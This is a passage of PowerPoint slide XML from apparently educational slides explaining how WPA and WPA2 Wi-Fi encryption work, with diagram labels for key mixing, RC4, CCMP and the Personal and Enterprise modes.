              <a:avLst/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0" name="Picture 69" descr="one2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{277F2D36-52FB-43BF-AFE0-A62132157ED4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61224" y="4117960"/>
              <a:ext cx="617467" cy="61746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71" name="Straight Arrow Connector 70">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56FEEFC9-2B9D-4F1A-8DAA-05388F6FE766}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10569957" y="3903558"/>
              <a:ext cx="0" cy="239604"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="19050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F4D4FEF7-5E0B-41AC-B9DA-00DED85CD59C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10160425" y="4206540"/>
              <a:ext cx="854832" cy="459916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Fragmen-tation</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p: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5231F6A0-DFB6-4FA4-AFF4-4A17E7DFB9CC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6736607" y="5241256"/>
              <a:ext cx="0" cy="138160"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/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4" name="Picture 73" descr="one">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{814F0427-F1AA-41A6-A42B-843AAE5C3006}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr preferRelativeResize="0"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17477" y="5375609"/>
              <a:ext cx="226266" cy="2286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EB0E190B-A2FA-4B66-B936-F78188FCEE2A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6594559" y="5326560"/>
              <a:ext cx="266955" cy="31840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X</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p: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D46FE02C-6AC1-4857-A257-BD3863F16704}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="6732109" y="5594911"/>
              <a:ext cx="0" cy="140936"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/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Elbow Connector 158">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02E8C60A-F99D-401C-934E-51128CC0A00C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="7199525" y="3994864"/>
              <a:ext cx="251448" cy="1575249"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2">
              <a:avLst/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" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC243627-1651-44AC-8D76-7AA052F7B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817" y="3459257"/>
              <a:ext cx="1738213" cy="301736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9" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE32AA5B-C785-40F0-8545-DA82944F8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817" y="3802550"/>
              <a:ext cx="1738213" cy="301736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00B05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0" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15630073-ED24-47A4-BC16-9709324E1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817" y="4145845"/>
              <a:ext cx="1738213" cy="301736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0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1E6D9DC0-C5E7-44D5-9EA6-A38C400C8C1B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2314141" y="3798642"/>
              <a:ext cx="1243042" cy="309558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5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Transmit Address</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp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F9C4D179-8BDA-4E17-9E08-E2A2F0ED291D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2442819" y="4141937"/>
              <a:ext cx="989100" cy="309558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5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TSC (IV + EIV)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="83" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18A3935B-6AD2-4FB5-99E8-E3E118F42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23963" y="5793585"/>
              <a:ext cx="1039499" cy="301736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B2D5056A-B5E9-43AD-A35B-6F3BC215E94B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7800331" y="5785251"/>
              <a:ext cx="1086761" cy="31840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Mac Header</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="85" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D9D5CE2-53AE-44D2-9243-1894B0686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66142" y="5793585"/>
              <a:ext cx="1117169" cy="301736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6" name="Rectangle 85">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E7926E8-7313-488D-B957-27F488370978}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10635885" y="5785251"/>
              <a:ext cx="977685" cy="31840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Ciphertext</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="87" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B081A19-1F0C-4F73-8D5E-D7E4B14EF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19484" y="5793585"/>
              <a:ext cx="524385" cy="301736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0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49CCCE2C-7BD8-4E8B-8FB8-EECB57103BE9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9024391" y="5786338"/>
              <a:ext cx="314569" cy="31840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IV</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="89" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8AB3FD7-EAE0-418D-B8E4-2D21812C6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76261" y="5793585"/>
              <a:ext cx="500713" cy="301736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3234647D-82A4-4342-BD9F-6A123B3C622D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9524099" y="5785251"/>
              <a:ext cx="405036" cy="31840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KID</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="91" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{416D71DC-F743-42C9-9366-DD0F7C0B3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09364" y="5793585"/>
              <a:ext cx="524385" cy="301736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0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DAB2561C-5985-4404-B8B5-7B28A1EF72AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10076973" y="5786377"/>
              <a:ext cx="389164" cy="31840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EIV</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="93" name="Elbow Connector 182">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E57EBFF-7B51-41FB-9185-27394BE6140A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="7520465" y="5001767"/>
              <a:ext cx="899057" cy="108562"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val -926"/>
              </a:avLst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4" name="Picture 93" descr="one2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE7E2BBD-C9B8-4277-BE7B-55A10EE9333E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10789" y="4416034"/>
              <a:ext cx="617467" cy="61746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C6DBF16A-E3E4-4B8F-898F-6A49B4B4A11E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8066531" y="4403752"/>
              <a:ext cx="711966" cy="636806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CRC-32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Check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sum</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="96" name="Elbow Connector 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A648B7D-511F-4DAB-B4F6-F402101F49D7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800992" y="1622222"/>
              <a:ext cx="1636497" cy="7304632"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 113969"/>
              </a:avLst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17FB4D07-7BF1-488F-8218-FFACF056F286}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="9176018" y="6088935"/>
              <a:ext cx="0" cy="249680"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/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525EB949-841E-4770-A9F7-B57B72628701}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2094843" y="3455348"/>
              <a:ext cx="1744160" cy="30955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5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Temporal Encryption Key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E105D352-9FD7-4C5C-9B23-D4F730783F53}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4445900" y="5712792"/>
              <a:ext cx="725924" cy="495293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RC4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Cipher</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Rectangle 101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CFA582F-1E52-4615-A705-D8B71377BA1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241989" y="4413630"/>
            <a:ext cx="1469311" cy="70788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itchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>How WPA Works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08FC742-61F8-4724-88BC-96E02699182F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="685800" y="2124075"/>
            <a:ext cx="666206" cy="666206"/>
            <a:chOff x="685800" y="2057400"/>
            <a:chExt cx="666206" cy="666206"/>
          </a:xfrm>
        </p:grpSpPr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F74F316F-A8CE-4B1C-A657-F10776BAB29C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="685800" y="2057400"/>
              <a:ext cx="666206" cy="666206"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:pr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3" name="Freeform 193">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F07C79E4-3F04-4D83-994D-912E08411B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7289" y="2175164"/>
              <a:ext cx="326005" cy="401402"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 203200 w 59"/>
                <a:gd name="T1" fmla="*/ 68636 h 68"/>
                <a:gd name="T2" fmla="*/ 203200 w 59"/>
                <a:gd name="T3" fmla="*/ 219635 h 68"/>
                <a:gd name="T4" fmla="*/ 189424 w 59"/>
                <a:gd name="T5" fmla="*/ 233362 h 68"/>
                <a:gd name="T6" fmla="*/ 13776 w 59"/>
                <a:gd name="T7" fmla="*/ 233362 h 68"/>
                <a:gd name="T8" fmla="*/ 0 w 59"/>
                <a:gd name="T9" fmla="*/ 219635 h 68"/>
                <a:gd name="T10" fmla="*/ 0 w 59"/>
                <a:gd name="T11" fmla="*/ 10295 h 68"/>
                <a:gd name="T12" fmla="*/ 13776 w 59"/>
                <a:gd name="T13" fmla="*/ 0 h 68"/>
                <a:gd name="T14" fmla="*/ 130875 w 59"/>
                <a:gd name="T15" fmla="*/ 0 h 68"/>
                <a:gd name="T16" fmla="*/ 151539 w 59"/>
                <a:gd name="T17" fmla="*/ 6864 h 68"/>
                <a:gd name="T18" fmla="*/ 192868 w 59"/>
                <a:gd name="T19" fmla="*/ 48045 h 68"/>
                <a:gd name="T20" fmla="*/ 203200 w 59"/>
                <a:gd name="T21" fmla="*/ 68636 h 68"/>
                <a:gd name="T22" fmla="*/ 185980 w 59"/>
                <a:gd name="T23" fmla="*/ 82363 h 68"/>
                <a:gd name="T24" fmla="*/ 130875 w 59"/>
                <a:gd name="T25" fmla="*/ 82363 h 68"/>
                <a:gd name="T26" fmla="*/ 117098 w 59"/>
                <a:gd name="T27" fmla="*/ 68636 h 68"/>
                <a:gd name="T28" fmla="*/ 117098 w 59"/>
                <a:gd name="T29" fmla="*/ 17159 h 68"/>
                <a:gd name="T30" fmla="*/ 17220 w 59"/>
                <a:gd name="T31" fmla="*/ 17159 h 68"/>
                <a:gd name="T32" fmla="*/ 17220 w 59"/>
                <a:gd name="T33" fmla="*/ 216203 h 68"/>
                <a:gd name="T34" fmla="*/ 185980 w 59"/>
                <a:gd name="T35" fmla="*/ 216203 h 68"/>
                <a:gd name="T36" fmla="*/ 185980 w 59"/>
                <a:gd name="T37" fmla="*/ 82363 h 68"/>
                <a:gd name="T38" fmla="*/ 55105 w 59"/>
                <a:gd name="T39" fmla="*/ 99522 h 68"/>
                <a:gd name="T40" fmla="*/ 148095 w 59"/>
                <a:gd name="T41" fmla="*/ 99522 h 68"/>
                <a:gd name="T42" fmla="*/ 151539 w 59"/>
                <a:gd name="T43" fmla="*/ 102954 h 68"/>
                <a:gd name="T44" fmla="*/ 151539 w 59"/>
                <a:gd name="T45" fmla="*/ 109817 h 68"/>
                <a:gd name="T46" fmla="*/ 148095 w 59"/>
                <a:gd name="T47" fmla="*/ 116681 h 68"/>
                <a:gd name="T48" fmla="*/ 55105 w 59"/>
                <a:gd name="T49" fmla="*/ 116681 h 68"/>
                <a:gd name="T50" fmla="*/ 51661 w 59"/>
                <a:gd name="T51" fmla="*/ 109817 h 68"/>
                <a:gd name="T52" fmla="*/ 51661 w 59"/>
                <a:gd name="T53" fmla="*/ 102954 h 68"/>
                <a:gd name="T54" fmla="*/ 55105 w 59"/>
                <a:gd name="T55" fmla="*/ 99522 h 68"/>
                <a:gd name="T56" fmla="*/ 151539 w 59"/>
                <a:gd name="T57" fmla="*/ 137272 h 68"/>
                <a:gd name="T58" fmla="*/ 151539 w 59"/>
                <a:gd name="T59" fmla="*/ 144135 h 68"/>
                <a:gd name="T60" fmla="*/ 148095 w 59"/>
                <a:gd name="T61" fmla="*/ 147567 h 68"/>
                <a:gd name="T62" fmla="*/ 55105 w 59"/>
                <a:gd name="T63" fmla="*/ 147567 h 68"/>
                <a:gd name="T64" fmla="*/ 51661 w 59"/>
                <a:gd name="T65" fmla="*/ 144135 h 68"/>
                <a:gd name="T66" fmla="*/ 51661 w 59"/>
                <a:gd name="T67" fmla="*/ 137272 h 68"/>
                <a:gd name="T68" fmla="*/ 55105 w 59"/>
                <a:gd name="T69" fmla="*/ 133840 h 68"/>
                <a:gd name="T70" fmla="*/ 148095 w 59"/>
                <a:gd name="T71" fmla="*/ 133840 h 68"/>
                <a:gd name="T72" fmla="*/ 151539 w 59"/>
                <a:gd name="T73" fmla="*/ 137272 h 68"/>
                <a:gd name="T74" fmla="*/ 151539 w 59"/>
                <a:gd name="T75" fmla="*/ 168158 h 68"/>
                <a:gd name="T76" fmla="*/ 151539 w 59"/>
                <a:gd name="T77" fmla="*/ 178453 h 68"/>
                <a:gd name="T78" fmla="*/ 148095 w 59"/>
                <a:gd name="T79" fmla="*/ 181885 h 68"/>
                <a:gd name="T80" fmla="*/ 55105 w 59"/>
                <a:gd name="T81" fmla="*/ 181885 h 68"/>
                <a:gd name="T82" fmla="*/ 51661 w 59"/>
                <a:gd name="T83" fmla="*/ 178453 h 68"/>
                <a:gd name="T84" fmla="*/ 51661 w 59"/>
                <a:gd name="T85" fmla="*/ 168158 h 68"/>
                <a:gd name="T86" fmla="*/ 55105 w 59"/>
                <a:gd name="T87" fmla="*/ 164726 h 68"/>
                <a:gd name="T88" fmla="*/ 148095 w 59"/>
                <a:gd name="T89" fmla="*/ 164726 h 68"/>
                <a:gd name="T90" fmla="*/ 151539 w 59"/>
                <a:gd name="T91" fmla="*/ 168158 h 68"/>
                <a:gd name="T92" fmla="*/ 134319 w 59"/>
                <a:gd name="T93" fmla="*/ 65204 h 68"/>
                <a:gd name="T94" fmla="*/ 185980 w 59"/>
                <a:gd name="T95" fmla="*/ 65204 h 68"/>
                <a:gd name="T96" fmla="*/ 182536 w 59"/>
                <a:gd name="T97" fmla="*/ 61772 h 68"/>
                <a:gd name="T98" fmla="*/ 141207 w 59"/>
                <a:gd name="T99" fmla="*/ 20591 h 68"/>
                <a:gd name="T100" fmla="*/ 134319 w 59"/>
                <a:gd name="T101" fmla="*/ 17159 h 68"/>
                <a:gd name="T102" fmla="*/ 134319 w 59"/>
                <a:gd name="T103" fmla="*/ 65204 h 6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9" h="68">
                  <a:moveTo>
                    <a:pt x="59" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="64"/>
                    <a:pt x="59" y="64"/>
                    <a:pt x="59" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="66"/>
                    <a:pt x="57" y="68"/>
                    <a:pt x="55" y="68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2" y="68"/>
                    <a:pt x="0" y="66"/>
                    <a:pt x="0" y="6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40" y="0"/>
                    <a:pt x="43" y="1"/>
                    <a:pt x="44" y="2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58" y="16"/>
                    <a:pt x="59" y="18"/>
                    <a:pt x="59" y="20"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="54" y="24"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="24"/>
                    <a:pt x="38" y="24"/>
                    <a:pt x="38" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="24"/>
                    <a:pt x="34" y="22"/>
                    <a:pt x="34" y="20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54" y="63"/>
                    <a:pt x="54" y="63"/>
                    <a:pt x="54" y="63"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="54" y="24"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="16" y="29"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="29"/>
                    <a:pt x="43" y="29"/>
                    <a:pt x="43" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="29"/>
                    <a:pt x="44" y="29"/>
                    <a:pt x="44" y="3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4" y="33"/>
                    <a:pt x="44" y="34"/>
                    <a:pt x="43" y="34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4"/>
                    <a:pt x="15" y="33"/>
                    <a:pt x="15" y="32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29"/>
                    <a:pt x="16" y="29"/>
                    <a:pt x="16" y="29"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="44" y="40"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="42"/>
                    <a:pt x="44" y="42"/>
                    <a:pt x="44" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="43"/>
                    <a:pt x="44" y="43"/>
                    <a:pt x="43" y="43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6" y="43"/>
                    <a:pt x="15" y="43"/>
                    <a:pt x="15" y="42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39"/>
                    <a:pt x="16" y="39"/>
                    <a:pt x="16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4" y="39"/>
                    <a:pt x="44" y="39"/>
                    <a:pt x="44" y="40"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="44" y="49"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="52"/>
                    <a:pt x="44" y="52"/>
                    <a:pt x="44" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="53"/>
                    <a:pt x="44" y="53"/>
                    <a:pt x="43" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="53"/>
                    <a:pt x="16" y="53"/>
                    <a:pt x="16" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="53"/>
                    <a:pt x="15" y="53"/>
                    <a:pt x="15" y="52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49"/>
                    <a:pt x="16" y="48"/>
                    <a:pt x="16" y="48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44" y="48"/>
                    <a:pt x="44" y="49"/>
                    <a:pt x="44" y="49"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="39" y="19"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="19"/>
                    <a:pt x="54" y="19"/>
                    <a:pt x="54" y="19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5"/>
                    <a:pt x="40" y="5"/>
                    <a:pt x="39" y="5"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="39" y="19"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="B92007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97213291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Прямоугольник 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C58DE429-D543-4858-9D58-5B095E24FB4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="-1" y="1291081"/>
            <a:ext cx="6498302" cy="1550873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1828434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4799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285455" y="4770120"/>
            <a:ext cx="3066323" cy="1138773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marL="2857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uses a set-up password (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pre-shared Key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PSK) to protect unauthorized network accesses</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ar-JO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</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1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" name="TextBox 63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="959919" y="4401195"/>
            <a:ext cx="1717393" cy="33855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WPA2-Personal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533912" y="4770120"/>
            <a:ext cx="3066323" cy="1661993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marL="285750" marR="0" lvl="1" indent="-28575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includes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EAP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or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RADIUS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for centralized client authentication using multiple authentication methods, such as token cards, and Kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ar-JO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</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1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4113190" y="4401195"/>
            <a:ext cx="1907766" cy="33855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WPA2-Enterprise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ED84D4C1-3BF3-42A7-996C-31029DD567BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2863492" y="230674"/>
            <a:ext cx="6465017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WPA2 Encryption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text Box 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22328721-C33D-49FA-8A6C-382D87E8BA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2112" y="1312934"/>
            <a:ext cx="5238044" cy="1477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R="0" lvl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WPA2 is an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upgrade to WPA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and it includes mandatory support for counter mode with cipher block chaining message authentication code protocol (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CCMP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),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 AES-based encryption mode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with strong security</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ar-JO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</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US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1905558C-06CC-4215-98FF-6CF6CF37CF2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2372306" y="3164707"/>
            <a:ext cx="230543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Modes of Operation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture Placeholder 7" descr="A picture containing swimming&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DE44D3B-0AC8-4616-9903-8647173BA18C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="19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446" r="28446"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7924800" y="1035709"/>
            <a:ext cx="4267200" cy="5563481"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Group 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16DE954E-B106-4213-8E5F-AEE174DD1E0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
